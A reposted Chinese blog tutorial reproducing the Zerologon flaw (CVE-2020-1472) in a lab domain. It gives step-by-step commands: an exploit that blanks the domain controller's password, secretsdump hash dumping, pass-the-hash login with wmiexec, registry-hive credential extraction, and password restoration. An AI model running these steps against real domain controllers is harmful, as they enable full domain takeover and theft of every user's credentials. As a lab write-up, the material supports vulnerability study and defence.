ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

CVE-2020-1472(域内提权)

2021-08-02 10:34:37  阅读:412  来源: 互联网

标签:save Windows py Server 1472 提权 2020 CVE


CVE-2020-1472(域内提权)

Created: July 7, 2021 5:25 PM

文章目录

简介

CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的情况下,存在较高概率使得产生的密文为全零。

影响范围

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

复现环境

DC(域控):Windows server 2016 IP:192.168.10.10
渗透机:Kali 2020 IP:192.168.10.2

pochttps://github.com/SecuraBV/CVE-2020-1472
用法:python3 zerologon_tester.py 域控主机名 域控IP

exphttps://github.com/dirkjanm/CVE-2020-1472
用法:python3 cve-2020-1472-exploit.py 域控主机名 域控IP

impackethttps://github.com/SecureAuthCorp/impacket
用法:python3 setup.py install

恢复原HASHhttps://github.com/risksense/zerologon

复现过程

  1. poc验证域控是否存在此漏洞

poc:https://github.com/SecuraBV/CVE-2020-1472

python3 zerologon_tester.py WIN-4482D4D19MT 192.168.10.10

在这里插入图片描述

  1. 置空DC密码,获取域内所有用户hash

exp:https://github.com/dirkjanm/CVE-2020-1472

sudo python3 cve-2020-1472-exploit.py WIN-4482D4D19MT 192.168.10.10

在这里插入图片描述

  1. 利用impacket中的secretsdump.py脚本dump所需的HASH信息(/impacket-master/examples)
sudo python3 secretsdump.py vu1n.com/WIN-4482D4D19MT\$@192.168.10.10 -no-pass

在这里插入图片描述

  1. 获取到管理员hash,利用wmiexec.py远程登录。
sudo python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:b3255351d8dfe7cdedf3f552a49146d6 vu1n.com/Administrator@192.168.10.1

在这里插入图片描述


恢复原机器hash

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

在这里插入图片描述

lget system.save
lget sam.save
lget security.save

在这里插入图片描述

del /f system.save
del /f sam.save
del /f security.save

在这里插入图片描述

利用secretsdump.py解析保存在本地的nt hash

sudo python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

恢复原HASH:https://github.com/risksense/zerologon

sudo python3 reinstall_original_pw.py WIN-4482D4D19MT 192.168.10.10 c5f386c8ef251abcc0e4c0f48ed37f21

在这里插入图片描述

参考

CVE-2020-1472复现打域控

CVE-2020-1472漏洞复现

标签:save,Windows,py,Server,1472,提权,2020,CVE
来源: https://blog.csdn.net/p01son/article/details/119319286

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有